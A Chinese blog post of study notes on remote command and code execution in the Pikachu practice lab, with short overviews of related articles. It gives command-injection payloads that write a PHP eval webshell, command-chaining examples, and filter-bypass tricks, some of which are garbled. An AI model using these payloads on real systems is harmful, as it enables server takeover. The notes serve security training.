RCE漏洞(远程命令执行)pikachu

最新推荐文章于 2024-05-16 10:15:47 发布
最新推荐文章于 2024-05-16 10:15:47 发布
阅读量246 收藏
点赞数 1
文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59607911/article/details/133879158
版权

一、RCE概述

RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。

二、RCE类型 

“ping”

使用命令创建文件(windows命令: echo 111 > 111.txt,创建111.txt文件,里面内容为111)

1&echo "<?php eval($_REQUEST[a]);?>" > 123.php

创建一个PHP文件并写入一句话木马

 

 

使用dir查询目录

1$dir

 

最后和文件上传一样直接进入目录,利用我们写入的木马文件进行相关的操作

“evel”

方法一:

 

方法二:

system('echo "<?php eval($_REQUEST[a]);?>" > 123.php'); 

system("dir"); 

 

 

 

三、执行函数 

以PHP为例

代码执行函数:

 php中 双引号会解析解析字符串中的变量,单引号不会解析
 
    如$a=123;则"$a" = "123"
 
eval()
 
assert()  
 
call_user_func()
 
create_function()
 
array_map()
 
call_user_func_array()
 
array_filter()
 
usort()、uasort()
 
preg_replace()
 

命令执行函数:

 system()
 
passthru()
 
exec()
 
shell_exec()
 
popen()/proc_open()
 
反引号 ``函数

四、Windows管道符

|:直接执行后面的语句。如:ping 127.0.0.1|whoami
 
 
||:如果前面执行的语句出错泽执行后面的语句,前面的语句智能为假 如:ping 2 || whoami
 
 
&:如果前面的语句为假则直接执行后面的语句,前面的语句可真可假 如 ping 127.0.0.1&whoami
 
 
&&:如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句只能为真。例如:ping 127.0.0.1&&whoami 

五、Linux管道符 

;:执行完前面的语句再执行后面的 例如:ping 127.0.0.1;whoami
 
 
|:显示后面语句的执行结果 例如:ping 127.0.0.1|whoami
 
 
||:当前面的语句只能怪出错时,执行后面的语句,例如:ping 1||whoami
 
 
&:如果当前面的语句为假则直接执行后面的语句,前面的语句可真可假。例如:ping 127.0.0.1&whoami
 
 
&&:如果前面的语句为假则直接出错,也不执行后面的,前面的语句只能为真 例如:ping 127.0.0.1&&whoami
 
 
%0a 换行符,执行完前面语句后继续执行后面语句
 
 
? 模糊匹配单个字符,如viper可用vi?er替代
 
* 模糊匹配多个字符,如viper可用*er替代

六、绕过方式 

连接符

cat flag.php 'cat love xianyu'
先执行单引号内内容,将结果作为命令的一部分
 
cat flag.php$(cat love xianyu)
先执行$()内内容,将结果作为命令的一部分

查看文件的命令 

遇到了过滤可以互相替换

命令(使用方法):
 
cat (cat flag.php)
 
tac (tac flag.php)
 
more (more flag.php)
 
less (less flag.php)
 
head (head flag.php)
 
nl (nl flag.pgp)
 
od(od -c flag.php)
 
vi (vi flag.php)
 
vim (vim flag.php)
 
sort (sort flag.php)
 
uniq (uniq flag.php)
 
file (file -f flag.pgp)
 
grep (grep flag.php)
 
paste (paste flag.php)
 
xxd (xxd flag.php)

绕过空格方式 

cat$IFSflag.php
 
cat$IFS$1flag.php
 
cat${IFS}flag.php

绕过目录分隔符过滤 

cd ..;cat flag 

绕过关键字 

flag
 
fl'a'g单引号
 
fl"a"g双引号
 
fl\ag反斜杠
 
fl$@ag$@
 
f*

过滤全部字符 

/bin/base64

/???/???64 ???

构造数字 

echo $(())
 
0
 
echo ( (   ((~(( (())))
 
-1
 
echo ( (   ((~(( (())))( (   ((~(( (())))( (   ((~(( (())))
 
-1-1-1
 
echo ( ( (((((($(())))$((( ( ) ) ) ) (())))(())))((~$(())))))
 
-3
 
echo ( (   ((~(( ((( (   ((~(( (())))( (   ((~(( (())))( (   ((~(( (())))))))
 
2

 

悲郁的秋裤
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pikachuRCE
qq_43665434的博客
02-12 951
pikachuRCE 一、神魔是RCERCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 1、远程系统命令执行 出现原因:因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。 比如常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。而如果设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“
Pikachu系列——RCE
Zlirving_的博客
05-17 609
Pikachu靶场系列持续更新~   要像追剧追番一样追下去哦   实验三 —— CSRF RCE概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 RCE分为两种 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测
Pikachu靶场-RCE远程命令/代码执行漏洞~保姆级教程!!!
最新发布
2301_77360738的博客
05-16 372
全网最最最详细的Pikachu靶场远程命令/代码执行漏洞,看完包会,小白可入!!!
pikachu练习----RCE
ptxybird的博客
11-09 4285
一、RCE概念学习 RCE英文全称:remote command/code execute,分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。 Pi
Pikachu靶场-RCE
自强不息
12-29 740
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
pikachu靶场&RCE&文件包含&上传下载&越权(四)
weixin_41665162的博客
08-05 994
文章目录RCE概述RCE-PINGRCE-EVELFile Inclusion(文件包含漏洞)概述文件下载漏洞概念文件上传漏洞概述前端页面检查(client check)MIME TYPE漏洞getimagesizeover permission 概述水平越权垂直越权 RCE 概述 RCE(remote command/code execute)漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定
浅析JDWP远程命令执行漏洞 [ Mi1k7ea ]1
08-03
2022/3/2 下午8:30浅析JDWP远程命令漏洞 [ Mi1k7ea ]https://www.mi1k7ea.com/2021/08/06/浅析JDW
用友NC BeanShell远程代码执行
09-07
用友 NC bsh.[servlet](https://so.csdn.net/so/search?q=servlet&spm=1001.2101.3001.7020).BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限。 ## 漏洞影响 ``` NC 6.5版本 具体详见...
dvwa靶场上的 RCE漏洞+暴力破解的简单学习
太阳照耀我走四方
02-14 767
针对dvwa靶场的 RCE漏洞 + 暴力破解的简单学习
08-(RCE命令及代码执行漏洞
qq_56414082的博客
03-28 882
RCE英文全称:remote command/code execute(远程命令/代码执行漏洞)分为远程命令执行ping和远程代码执行eval。
网络安全-渗透测试-RCE远程代码执行漏洞(1)-命令执行、代码执行
weixin_52796034的博客
10-26 2772
RCE(Remote Code Execution)远程代码执行漏洞(有时也叫命令执行漏洞)是一种安全漏洞,攻击者可以利用它来执行远程代码,从而控制受影响的系统。这种漏洞通常出现在应用程序或软件中,攻击者可以通过输入恶意构造的指令或数据,使得应用程序或软件在执行执行攻击者指定的代码。RCE的范围比较广,只要渗透的最终结果可以实现执行命令或者代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE,通常情况下RCE漏洞都可以归为高危漏洞
pikachu皮卡丘渗透测试靶场】远程命令、代码执行漏洞原理及案例演示
algae
04-17 2179
37.6-1 远程命令、代码执行漏洞原理及案例演示(Av96582332,P37) RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 ...
文件上传漏洞pikachu靶场实操(全网最详细最全面)
qq_64652650的博客
10-18 791
文件上传漏洞实操
30.WEB漏洞-RCE代码及命令执行漏洞
mingyqf的博客
04-10 2821
30:WEB漏洞-RCE代码及命令执行漏洞 参考文章:https://www.cnblogs.com/zhengna/p/15775737.html 本文为博主学习复现笔记 文章目录30:WEB漏洞-RCE代码及命令执行漏洞思维导图产生原理:漏洞形成条件:可控变量&漏洞函数RCE漏洞危害1、执行系统命令(Windows:DOS命令、linux)2、执行脚本代码(php、java、python)1.代码执行演示2.命令执行演示脚本代码1.php:代码执行函数:命令执行函数:2.Python:exec等
除了文件上传还有哪些方式可以写一句话木马?
qq_51553814的博客
11-29 2288
除了文件上传还有哪些方式可以写一句话木马? 一句话木马如果上传到服务器的话,有啥危害学过网络安全的人都知道。但是通常网上流传的方式都是通过文件上传来实现木马上传,实在太过老套,这里就教大家几个新的方式来本地生成一句话木马。(这篇笔记知识带大家入个门,想了解的话还得自己查询资料来学习) 这篇笔记也是有很多跳转内容,看不懂可以尝试看看跳转的博客,他们写的一定是比我更好 结合sql注入生成一句话木马 讲这之前得先介绍mysql配置文件中的secure_file_priv选项 secure_file_priv配置
Pikachu靶场之RCE漏洞详解
m0_46467017的博客
05-18 6158
Pikachu靶场之RCE漏洞详解漏洞简述诚意推荐靶场闯关第1关 exec “ping”源码分析:第2关 exec "eval"源码分析 漏洞简述 一、什么是RCERCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 1、远程系统命令执行 出现原因:因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。 比如常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地
RCE代码及命令执行漏洞简解
weixin_46739058的博客
04-09 2294
Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用 代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代 码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏 洞。同样调用系统命令处理,将造成命令执行漏洞RCE:远程命令/代码执行(remote command/code execute) 在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符
pikachu靶场RCE漏洞
10-13
这是一个关于Pikachu靶场的RCE漏洞的问题。Pikachu靶场是一个用于渗透测试和漏洞研究的虚拟机,而RCE漏洞则是一种远程代码执行漏洞,攻击者可以利用该漏洞在受害者系统上执行任意代码。 针对这个问题,我建议您可以参考以下步骤来修复该漏洞: 1. 确认漏洞是否存在:可以通过手动或自动化的方式对系统进行扫描,以确认是否存在该漏洞。 2. 更新相关软件:如果发现存在漏洞,应及时更新相关软件版本,以修复漏洞。 3. 配置安全策略:可以通过配置安全策略来限制攻击者对系统的访问权限,从而减少漏洞被利用的风险。 4. 加强监控:可以通过加强监控来及时发现并阻止攻击行为,从而保护系统安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值